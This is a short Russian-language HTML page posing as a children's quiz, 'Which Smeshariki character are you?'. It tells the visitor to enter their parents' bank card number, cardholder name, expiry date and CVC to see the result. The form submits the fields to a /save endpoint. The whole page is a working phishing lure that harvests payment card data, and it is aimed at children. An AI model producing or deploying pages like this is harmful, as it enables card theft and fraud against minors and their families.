<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>
<body>

<h1>Кто ты из смешариков?</h1>
<p>Введи данные банковской карты родителей чтобы узнать.</p>

<form action="/save">
    <strong>Номер: </strong><input type="number" name="number"><br>
    <strong>ФИО: </strong><input type="text" name="name"><br>
    <strong>Срок действия: </strong><input type="text" name="date"><br>
    <strong>Три цифры на обороте: </strong><input type="text" name="cvc"><br>

    <button>Узнать результат!</button>
</form>

</body>
</html>